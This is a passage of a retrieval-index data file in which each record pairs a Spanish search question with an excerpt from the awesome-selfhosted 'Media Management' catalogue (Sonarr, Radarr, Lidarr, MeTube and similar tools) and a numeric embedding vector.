0.05153, 0.07008, -0.0176, -0.07234, -0.01111, -0.03075, -0.03117, 0.01692, -0.00226, 0.07678, -0.00278, 0.08934, -0.0568, 0.04059, -0.00314, 0.06793, 0.03239, 0.08929, 0.03798, -0.07767, -0.00402, -0.03604, -0.02657, 0.0577, 0.00458, 0.01657, -0.01521, -0.04394, -0.02023, -0.06714, 0.0031, -0.03408, -0.05429, 0.03645, -0.05593, -0.07556, 0.04723, -0.03389, -0.05445, -0.0004, -0.01648, 0.02107, -0.05614, 0.03537, -0.02158]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "que herramienta sirve para gestionar y organizar una colecciΓ³n musical descargada?", "v": [-0.01644, 0.10947, -0.18195, -0.26374, -0.05279, -0.14558, -0.08464, 0.06507, -0.03523, -0.1318, -0.07918, -0.13126, 0.08359, -0.10547, 0.05631, -0.01738, 0.14216, -0.13258, -0.0326, 0.058, -0.04408, 0.12144, -0.00533, -0.01132, -0.09008, -0.07124, 0.1224, -0.09474, -0.16114, 0.07935, 0.00439, 0.02855, 0.06817, -0.11602, -0.01169, -0.01763, 0.00438, 0.02398, -0.06536, -0.05439, -0.16416, 0.0498, -0.11323, 0.07171, -0.00024, -0.04102, 0.0878, 0.06973, -0.01328, 0.1277, -0.03175, 0.01079, -0.06466, 0.04991, 0.02897, -0.20663, -0.01212, -0.15827, 0.00347, -0.04717, -0.06649, -0.01651, -0.05518, 0.05386, 0.05964, 0.0402, 0.06291, -0.00013, -0.0242, 0.03285, -0.10494, 0.02503, 0.0226, 0.04315, -0.0138, 0.00011, 0.041, 0.01776, 0.02208, -0.03166, 0.08143, -0.03292, -0.05004, 0.01534, -0.02125, -0.08751, 0.1208, -0.00814, 0.04368, -0.00107, -0.0146, -0.06198, -0.08697, -0.0811, 0.01735, -0.0614, 0.09639, -0.01441, 0.14254, -0.01241, 0.04394, -0.05879, -0.02401, 0.0053, -0.01412, 0.12144, 0.04309, -0.01635, 0.0247, -0.01198, -0.07794, 0.00491, 0.03573, 0.05913, 0.00087, 0.02824, 0.04898, -0.02507, -0.00782, 0.03329, 0.04857, 0.00162, 0.00464, -0.00021, 0.03513, -0.00218, 0.04315, 0.0758, 0.02324, -0.04194, 0.0059, -0.10236, -0.03185, 0.06418, -0.01469, -0.1022, -0.03782, -0.08559, 0.03809, -0.07687, 0.00876, 0.08199, -0.04128, -0.07127, 0.08693, -0.0713, 0.07827, -0.03411, 0.09542, 0.05293, 0.06859, -0.03652, -0.01899, 0.0057, -0.01566, 0.06808, -0.0175, 0.00275, -0.1046, -0.04027, -0.09618, -0.02288, 0.03183, 0.01353, 0.02205, -0.06409, 0.07572, 0.05815, 0.01688, 0.01912, 0.01635, 0.00251, 0.04428, -0.04139, -0.01755, -0.07577, -0.07625, -0.10963, 0.11922, 0.00983, -0.0258, -0.02586, -0.0322, 0.00793, 0.02203, -0.04412, 0.0001, -0.00748, -0.04947, -0.01075, 0.01709, 0.03753, -0.03057, -0.01161, 0.06992, 0.02981, -0.06649, -0.02673, -0.02691, 0.06837, -0.04293, -0.09507, -0.02095, 0.00533, 0.07566, 0.04993, -0.05762, 0.03497, 0.04729, 0.01539, 0.00805, 0.00925, 0.00394, -0.00088, -0.02661, -0.05562, -0.02595, 0.03423, 0.00463, 0.0061, -0.04478, 0.00391, 0.08602, -0.01595, -0.02208, 0.06734, 0.02319, 0.01341, 0.07263, 0.0488, 0.02583, 0.00423, 0.02938, 0.02808, -0.02262, -0.07098, 0.04018, -5e-05, -0.0628, -0.01498, 0.01669, 0.05506, 0.01696, -0.0083, -0.04572, -0.06107, 0.02478, 0.04334, -0.01165, -0.03556, -0.00664, 0.02013, 0.06295, 0.01692, 0.01843, 0.00707]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "que herramienta sirve para descargar y organizar automΓ‘ticamente pelΓ­culas y series en mi servidor personal", "v": [0.02087, 0.13215, -0.16417, -0.25586, -0.02307, -0.14873, -0.04307, -0.07009, 0.0016, -0.08072, -0.07369, -0.08735, 0.0394, -0.15046, 0.05958, 0.02671, 0.14631, -0.13516, 0.04723, 0.10333, 0.01748, 0.074, -0.00657, -0.0379, -0.06672, -0.01015, 0.13707, -0.01823, -0.22753, -0.00627, 0.01928, 0.04661, 0.09333, -0.09949, -0.04125, -0.07391, -0.05078, 0.10628, -0.10491, 0.02325, 0.01062, 0.07686, -0.07309, 0.15943, 0.0497, 0.02586, 0.07104, 0.01566, 0.04092, 0.01717, -0.04339, -0.07147, -0.04653, -0.03244, -0.00451, -0.13076, 0.07414, -0.16003, 0.03057, -0.01177, -0.14213, -0.00914, -0.04536, -0.00713, 0.05281, 0.03741, 0.00585, -0.04862, -0.09192, -0.06709, -0.12915, -0.01048, 0.03007, -0.00072, 0.02845, 0.04385, 0.01447, -0.02057, 0.04668, 0.02612, 0.06068, -0.06254, -0.0212, 0.10481, -0.11434, -0.09863, 0.01525, 0.00173, 0.09299, -0.01137, 0.01955, 0.04716, -0.03925, 0.06754, 0.05677, -0.04042, 0.17001, -0.0054, 0.09309, 0.06694, 0.07906, -0.09448, 0.00738, 0.08484, -0.05997, 0.04336, 0.06113, -0.01459, -0.03245, -0.06106, -0.0081, 0.03019, 0.02712, -0.0298, -0.01914, -0.07309, 0.04361, -0.02048, 0.01088, 0.05025, -0.07269, 0.00353, -0.02208, -0.04807, -3e-05, -0.05906, 0.03979, 0.0324, -0.00904, -0.07048, 0.00142, -0.06249, -0.15115, -0.00107, 0.00705, -0.08189, 0.01694, -0.0806, -0.03172, -0.11992, 0.03924, 0.05778, -0.03835, -0.03346, 0.0956, -0.03368, 0.05289, -0.0928, -0.00385, 0.01938, 0.04436, -0.04823, 0.02366, 0.00242, -0.058, 0.03138, 0.00716, -0.08401, -0.01388, 0.03563, 0.05461, -0.03612, 0.02833, 0.02671, -0.012, -0.03094, -0.00217, 0.04009, 0.06109, 0.07375, 0.0033, 0.0092, -0.00516, -0.07697, -0.03536, -0.07756, -0.05752, -0.04739, 0.02685, 0.00587, -0.01928, 0.00469, -0.02659, -0.01773, -0.04405, -0.10516, 0.00108, -0.04068, 0.03815, 0.0169, 0.00833, 0.05629, -0.04736, -0.03376, 0.01254, -0.04889, -0.10177, -0.02468, 0.0509, -0.02032, -0.0475, -0.06289, -0.04247, 0.01525, 0.03528, 0.03296, -0.02371, 0.03774, -0.00612, 0.03717, -0.02254, 0.02019, 0.08278, -0.04341, -0.07975, -0.01537, 0.03488, -0.00869, 0.00848, -0.01696, -0.01246, -0.02328, 0.03852, -0.03502, -0.02569, 0.03171, 0.04063, 0.003, 0.0538, -0.02249, -0.0582, 0.0546, -0.02102, -0.04427, 0.04715, -0.02039, 0.0463, -0.05767, -0.04058, -0.04954, 0.017, 0.07476, 0.00056, -0.06946, -0.05906, -0.08383, 0.01832, 0.02269, -0.01935, -0.05991, -0.04366, 0.03081, 0.04021, -0.00526, -0.01323, -0.0023]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "cual programa me ayuda a gestionar mejor mis audios y subtΓ­tulos con prioridades configurables", "v": [0.3048, 0.19699, -0.05762, -0.12966, 0.15816, -0.08061, 0.00536, -0.06398, -0.15842, -0.05507, -0.04215, -0.02123, -0.02489, -0.01807, 0.02802, -0.04297, 0.10314, -0.09586, 0.03745, 0.12579, 0.09362, -0.04221, -0.06424, -0.06364, -0.05293, -0.01914, 0.12083, -0.00139, -0.07251, -0.02063, 0.02265, 0.0281, 0.0194, -0.0962, -0.02433, 0.07056, -0.03363, 0.14021, -0.03153, 0.07027, -0.02301, -0.03473, -0.06353, 0.00575, 0.12905, -0.05967, 0.01903, 0.01182, -0.01221, -0.04659, -0.00085, 0.01815, -0.06887, -0.00661, 0.10653, -0.0835, 0.05937, -0.16802, -0.06144, -0.08076, -0.07134, 0.01197, 0.06522, -0.02738, 0.07232, 0.03834, 0.09929, -0.05027, -0.03757, 0.03704, -0.08945, 0.03593, 0.03146, -0.0214, 0.06889, 0.01555, 0.01297, -0.06339, 0.09365, -0.0222, 0.02544, -0.05059, 0.0059, 0.10491, -0.03025, 0.01029, 0.01777, 0.00889, -0.09739, -0.00273, 0.01742, -0.08491, 0.01176, -0.0356, 0.03358, 0.03794, 0.13345, 0.0567, 0.03249, -0.01315, 0.01809, 0.03349, -0.08679, 0.13123, 0.03486, 0.12743, -0.00301, -0.15641, 0.01219, -0.00712, -0.03164, 0.00638, 0.01924, -0.03891, -0.06273, -0.06087, 0.01099, 0.00676, 0.10198, -0.00995, -0.08493, -0.00604, -0.05158, -0.0294, 0.06983, 0.0284, 0.04324, 0.02246, 0.07236, 0.10945, 0.01029, -0.02671, 0.03613, -0.11743, -0.04524, -0.06046, -0.02348, 0.00777, -0.02115, -0.06574, -0.04599, 0.05563, 0.05375, 0.00106, 0.08041, -0.02127, 0.04613, -0.02849, 0.07015, 0.04706, 0.05236, 0.04729, 0.00448, -0.00646, -0.07988, -0.02701, -0.04172, -0.06207, -0.01913, 0.02612, 0.00134, -0.03259, 0.0207, -0.04125, 0.00885, -0.05207, 0.02447, 0.04763, 0.05541, -0.04496, -0.02562, 0.00726, 0.02188, -0.02564, -0.1, -0.13287, 0.02663, -0.07667, 0.08454, -0.0075, -0.08743, 0.03304, 0.048, -0.01, -0.05236, -0.0997, -0.10068, -0.0488, -0.05859, -0.00937, 0.0395, 0.01526, -0.01241, 0.01295, 0.04172, -0.08566, -0.09051, -0.02205, -0.08128, 0.01645, -0.11567, 0.01526, 0.01127, -0.07974, 0.04833, 0.08687, 0.00297, 0.02816, 0.05687, 0.09683, 0.00082, -0.02241, -0.00779, 0.04403, -0.03199, -0.00882, -0.00825, 0.02994, -0.03264, -0.00518, 0.02021, 0.03746, 0.06687, 0.01099, -0.00515, -0.01802, 0.10333, 0.05375, -0.01374, 0.01347, -0.04469, -0.02416, -0.03474, -0.05683, 0.02611, -0.00246, 0.012, -0.01613, -0.02967, -0.04041, 0.0176, 0.10565, -0.01109, -0.02412, 0.00098, -0.03978, -0.02941, 0.06939, 0.04381, -0.01605, 0.02081, 0.07084, 0.03209, -0.06647, 0.06673, -0.06293]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "hay alguna alternativa libre o de cΓ³digo abierto para montar un sistema de solicitud de contenido como Plex?", "v": [-0.08843, 0.07225, -0.17331, -0.12447, -0.17006, -0.18855, -0.00439, -0.00779, -0.20534, -0.19389, -0.06626, -0.1804, 0.06378, -0.07578, 0.10761, -0.07594, 0.02525, -0.15862, 0.08962, -0.06611, -0.0967, -0.04577, -0.14095, -0.10397, -0.08075, 0.00667, 0.01587, -0.07478, -0.09108, -0.03343, 0.01548, 0.02184, 0.05075, 0.0713, -0.04971, 0.03642, 0.19071, 0.01821, 0.05913, -0.04664, -0.02435, -0.02773, -0.03891, 0.09404, -0.02007, -0.02045, 0.02442, 0.08068, -0.04341, -0.01249, 0.02535, -0.09002, -0.08205, -0.00813, 0.07437, 0.02525, 0.09068, -0.11174, -0.08754, -0.02878, 0.04811, 0.03363, 0.03473, -0.09996, -0.02705, -0.00322, 0.04875, 0.11013, -0.05462, 0.11782, 0.02383, -0.09012, -0.01896, 0.01792, -0.02933, 0.03521, -0.0729, -0.15174, -0.03111, 0.13266, 0.0511, -0.01094, -0.01968, 0.02417, -0.05896, -0.04548, 0.06517, -0.10161, -0.01371, 0.01255, 0.14674, 0.02698, 0.04223, 0.1283, 0.06613, -0.11528, -0.0506, 0.14628, -0.01612, 0.06757, 0.01179, 0.01224, 0.00129, -0.01356, 0.05565, -0.03044, 0.04852, -0.04211, 0.02118, 0.03477, -0.01342, -0.01615, -0.0866, 0.02205, -0.13321, -0.12696, -0.05737, 0.06063, -0.00091, -0.02475, -0.08584, 0.05681, -0.03052, -0.0158, 0.05479, 0.0187, 0.10159, 0.07725, -0.03798, -0.00671, 0.01906, -0.06609, -0.05747, 0.00054, -0.02745, -0.04223, 0.06413, 0.06012, 0.00875, 0.03067, -0.01998, -0.01817, 0.04726, 0.03579, 0.00916, -0.00841, 0.03473, -0.06101, -0.03026, -0.05297, -0.06967, 0.03775, -0.02111, -0.01275, -0.07866, 0.028, -0.00111, -0.00146, -0.00537, 0.02655, -0.02062, -0.02623, -0.05881, -0.00137, -0.02616, -0.0153, -0.00671, -0.03672, -0.02582, 0.01251, 0.01616, 0.05768, 0.15165, -0.07938, 0.03775, -0.04596, -0.03668, -0.07203, -0.01549, -0.01329, -0.01376, 0.03952, 0.01312, -0.00839, 0.00136, -0.0138, 0.00458, 0.04891, -0.01474, -0.02074, 0.01113, -0.00715, -0.03781, -0.00158, 0.02333, 0.01444, 0.03006, 0.00037, 2e-05, -0.01387, -0.03949, 0.04859, 0.03287, -0.09553, -0.05041, 0.05252, 0.01013, 0.02746, 0.01246, 0.08243, 0.06633, -0.0031, 0.05457, 0.0275, -0.02136, 0.07142, -0.02583, 0.07432, 0.02245, -0.01262, -0.01427, -0.0051, -0.00062, 0.02563, -0.00016, 0.0022, -0.01651, 0.04733, -0.01674, -0.01444, -0.0112, -0.05427, 0.00318, 0.05217, 0.01979, 0.00081, -0.01727, 0.03259, 0.0218, -0.04791, 0.02666, 0.06883, 0.00015, -0.03408, -0.00153, -0.00256, -0.07059, -0.0317, -0.00012, -0.04609, -0.05815, 0.00162, -0.05665, -0.04953, -0.03811, 0.02132]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "que programa me sirve para gestionar automΓ‘ticamente las descargas de mi biblioteca de TV?", "v": [0.07615, 0.0904, -0.08143, -0.22488, 0.03471, -0.04875, -0.08833, -0.00402, -0.05011, -0.08303, -0.00821, -0.11058, 0.02779, -0.03519, -0.0093, -0.00335, 0.10976, -0.15948, 0.14905, 0.02347, 0.14494, 0.07302, -0.01415, -0.02749, -0.01109, -0.01983, 0.06096, -0.02275, -0.13219, 0.03084, 0.03595, -0.00234, 0.05543, -0.10722, 0.03423, 0.02997, 0.0952, 0.02367, -0.02558, -0.02232, 0.02362, 0.05045, 0.03265, 0.08947, 0.04411, -0.03393, 0.18609, -0.05524, 0.01181, 0.02486, -0.05819, -0.00546, 0.02873, 0.00364, 0.01789, -0.08829, -0.04214, -0.14565, -0.05377, -0.01116, -0.04354, 0.02646, 0.01172, -0.0485, 0.13079, 0.03458, 0.0839, 0.06006, -0.13963, 0.0913, -0.11179, 0.05478, 0.00726, 0.03516, -0.1206, 0.06197, -0.0521, -0.06223, 0.12559, -0.03701, 0.00708, -0.06997, 0.0472, 0.03124, -0.11174, -0.01581, -0.00652, -0.05612, 0.00498, 0.01035, -0.10187, -0.01048, -0.05886, 0.03, 0.12591, -0.05117, 0.09721, 0.01284, 0.07417, 0.12005, 0.02977, -0.00189, -0.01834, 0.12475, -0.01139, 0.06683, 0.01131, -0.07503, -0.04738, -0.05944, 0.03805, 0.03327, 0.06498, -0.05825, -0.06698, 0.06906, 0.05875, -0.0183, 0.0194, 0.08631, -0.17877, -0.03234, -0.02428, 0.01065, 0.10425, -0.03215, 0.10233, 0.06395, -0.0237, 0.07159, -0.00112, -0.02926, -0.0232, -0.01719, -0.08839, -0.07953, -0.04332, -0.1098, -0.0669, -0.08993, 0.01012, 0.03925, 0.00554, 0.04072, 0.03902, -0.11737, 0.02762, -0.04006, 0.03037, 0.01673, 0.0108, -0.038, 0.03679, 0.01355, 0.00535, 0.05722, 0.1108, -0.05915, -0.07271, 0.02833, -0.03372, -0.01937, 0.0038, -0.04182, -0.04231, -0.03276, -0.01691, 0.01785, 0.09942, 0.05869, -0.08646, 0.0182, 0.00218, -0.08304, -0.08259, -0.05739, -0.01195, -0.02538, 0.06233, 0.07466, -0.10899, 0.02334, 0.09715, 0.01028, -0.08006, -0.0658, -0.08534, -0.01481, -0.0265, -0.06215, -0.00857, 0.04736, -0.05407, -0.02363, 0.0331, -0.00026, -0.064, 0.06351, 0.03355, -0.02263, -0.05409, 0.03915, 0.04966, 0.08599, 0.04717, 0.02861, 0.01236, 0.06504, 0.03593, 0.056, -0.02755, 0.06088, 0.08553, 0.00374, -0.05095, -0.06641, 0.00777, 0.06477, 0.07643, -0.02746, -0.01936, -0.04325, 0.08008, 0.05521, -0.02207, -0.04454, 0.035, 0.01844, 0.04151, -0.00344, -0.06346, -0.07426, 0.01845, 0.00464, 0.0188, -0.05395, 0.01443, -0.02504, 0.01598, -0.05748, -0.06437, 0.07364, -0.00962, -0.05621, -0.02925, 0.00518, -0.05353, 0.0385, -0.00904, 0.01495, -0.0249, -0.01699, -0.016, -0.00488, 0.06394, 0.02459]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "cual es la alternativa libre a Release Radar para el seguimiento musical?", "v": [-0.10938, 0.04508, -0.06337, -0.10989, -0.15813, -0.02539, -0.04323, -0.04052, -0.09547, 0.0566, 0.02397, -0.25228, 0.10882, -0.03511, 0.14212, -0.00631, 0.00666, 0.03573, 0.08513, -0.00419, -0.04492, -0.01021, -0.08205, -0.00737, 0.01413, -0.01078, 0.04437, -0.01021, -0.01145, -0.01795, 0.077, 0.04338, -0.00509, -0.00708, -0.11697, 0.02339, 0.23799, 0.07854, -0.03547, -0.09218, -0.05892, -0.11506, 0.02767, 0.04698, 0.03047, -0.06185, 0.02505, 0.1404, 0.01294, 0.08879, 0.07077, 0.14879, -0.0493, 0.03259, 0.09735, -0.12418, 0.05841, -0.14573, -0.10092, -0.07073, -0.00911, 0.0058, 0.02625, 0.03236, 0.0354, -0.05248, 0.05973, -0.01737, -0.00082, 0.05909, 0.08677, -0.0049, -0.00604, 0.04663, -0.11571, 0.03348, -0.08827, -0.07442, 0.00302, -0.05851, 0.07574, -0.01959, 0.07461, 0.11532, -0.0024, 0.03678, 0.16234, -0.10724, -0.04386, 0.09575, 0.05156, 0.05848, -0.08861, 0.1182, 0.04233, -0.1188, 0.0989, 0.05641, 0.00645, 0.02044, -0.01262, -0.0056, -0.00883, -0.09553, 0.02722, 0.06188, 0.02659, -0.00612, 0.03564, 0.11022, -0.07651, 0.03917, 0.00225, 0.02428, 0.00057, 0.02032, -0.0402, 0.0602, 0.003, 0.03316, 0.0237, 0.04095, -0.0516, -0.14989, 0.03604, -0.04567, 0.00325, 0.02471, -0.03817, 0.02489, 0.09791, -0.08737, -0.03448, -0.06628, -0.0691, -0.05669, 0.02102, -0.03182, 0.02991, 0.04875, 0.09881, 0.0105, -0.02897, 0.01736, 0.06859, -0.0945, 0.03654, 0.01303, 0.0734, 0.00278, -0.04828, 0.08419, -0.08941, 0.01672, -0.03371, 0.01921, 0.03347, 0.0602, -0.08058, 0.00988, 0.01414, 0.01015, -0.06395, -0.00741, -0.00299, 0.02091, 0.05097, 0.00229, -0.03653, -0.02689, -0.05935, 0.06503, 0.07961, -0.05656, -0.01427, -0.10653, -0.04839, -0.09201, 0.12028, -0.00552, -0.02495, 0.04577, -0.06314, 0.01625, 0.04144, -0.05152, -0.05496, -0.0273, -0.02909, 0.06409, -0.07143, -0.05748, -0.03778, -0.06003, -0.01117, -0.00086, 0.00777, -0.06778, -0.06416, 0.07993, -0.06154, -0.09149, -0.01914, -0.06139, 0.01065, 0.02142, -0.02295, 0.06304, 0.04471, 0.04588, 0.01736, -0.02511, 0.04457, 0.06812, -0.0596, 0.01123, 0.01143, -0.02026, 0.0247, -0.00398, 0.01003, 0.07392, 0.08592, 0.04828, -0.04556, 0.06046, 0.02149, 0.02299, 0.03173, 0.02419, 0.00222, -0.00233, 0.02362, 0.0271, -0.02508, -0.01014, -0.00698, 0.0406, -0.00606, -0.03305, 0.07656, 0.07366, -0.0425, -0.00068, -0.04029, -0.02399, -0.04512, 0.01126, -0.00377, -0.02631, -0.01459, 0.05505, 0.02448, 0.04748, 0.06057, 0.01596]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "con que puedo sincronizar mis canales de YouTube con un servidor local?", "v": [0.03197, -0.03495, -0.10265, 0.00494, -0.08624, -0.08085, 0.01949, 0.0073, 0.04861, -0.08799, -0.04471, -0.07361, 0.06687, -0.01978, -0.06863, 0.07251, 0.09801, -0.0653, 0.11287, 0.02293, -0.00073, -0.06343, 0.03319, -0.03233, -0.00763, -0.02848, -0.04055, -0.06944, -0.05229, -0.07653, -0.06642, 0.03726, -0.03888, 0.09187, 0.01643, -0.06804, 0.00772, 0.18235, -0.14217, 0.02594, -0.0332, 0.00614, -0.14395, 0.05198, -0.04087, 0.06361, 0.00792, -0.12824, 0.00668, 0.00522, -0.00946, -0.05424, -0.22011, 0.00945, -0.04027, 0.00492, 0.03371, -0.13783, 0.04411, -0.06675, -0.02999, -0.11769, 0.04503, -0.01442, 0.06047, 0.07832, -0.00196, 0.07569, -0.07637, 0.00239, -0.07957, 0.05873, -0.03435, 0.00782, 0.09447, 0.18203, -0.07688, 0.00391, 0.01755, 0.02698, 0.04765, -0.02276, 0.03361, 0.03936, -0.13995, -0.09037, -0.02403, -0.03239, 0.01681, -0.14618, -0.00037, 0.14033, 0.04477, 0.06972, -0.00639, -0.02317, 0.04524, -0.03021, -0.07368, -0.07198, 0.07107, 0.02923, -0.07783, 0.10208, 0.07118, 0.11648, 0.12515, -0.12762, 0.06457, 0.03288, 0.04545, 0.11879, -0.02876, -0.05437, -0.0812, 0.01607, -0.04669, 0.00746, 0.02602, 0.06887, 0.04569, -0.04976, -0.01679, -0.07115, 0.00971, 0.03437, 0.04553, 0.0144, 0.07034, -0.00467, 0.02749, 0.03746, 0.02846, -0.0416, 0.06816, 0.01343, 0.06472, -0.06268, -0.10315, -0.07674, 0.01116, -0.03192, -0.03465, 0.01154, 0.13218, -0.02733, 0.01812, -0.1517, -0.18295, 0.04533, 0.00837, 0.00281, -0.08443, -0.06896, -0.07183, 0.05178, 0.03084, -0.07941, -0.04305, 0.05257, 0.09045, -0.05083, 0.0641, -0.02139, -0.02294, 0.01048, -0.07488, 0.10085, -0.03156, -0.02123, -0.03252, 0.10793, -0.01181, -0.05797, -0.03939, -0.0487, 0.00371, -0.0034, 0.09931, 0.04258, -0.05916, 0.04579, -0.01299, 0.05995, -0.03455, -0.10846, -0.06034, -0.02195, -0.01302, 0.0254, -0.02916, -0.05887, -0.06333, 0.08081, 0.03914, -0.03432, -0.06132, -0.03901, 0.01082, -0.04783, -0.05478, -0.05378, 0.01025, -0.01682, -0.07289, 0.01463, -0.03114, 0.01036, -7e-05, 0.03954, -0.06129, -0.05938, 0.02115, -0.04698, -0.03165, -0.00438, 0.09971, -0.04375, 0.01339, 0.01343, 0.05126, 0.01711, -0.0032, -0.05722, -0.04404, 0.04253, 0.02578, -0.03342, -0.00961, -0.01038, -0.06834, -0.00269, -0.10352, -0.03224, 0.02891, 0.01738, 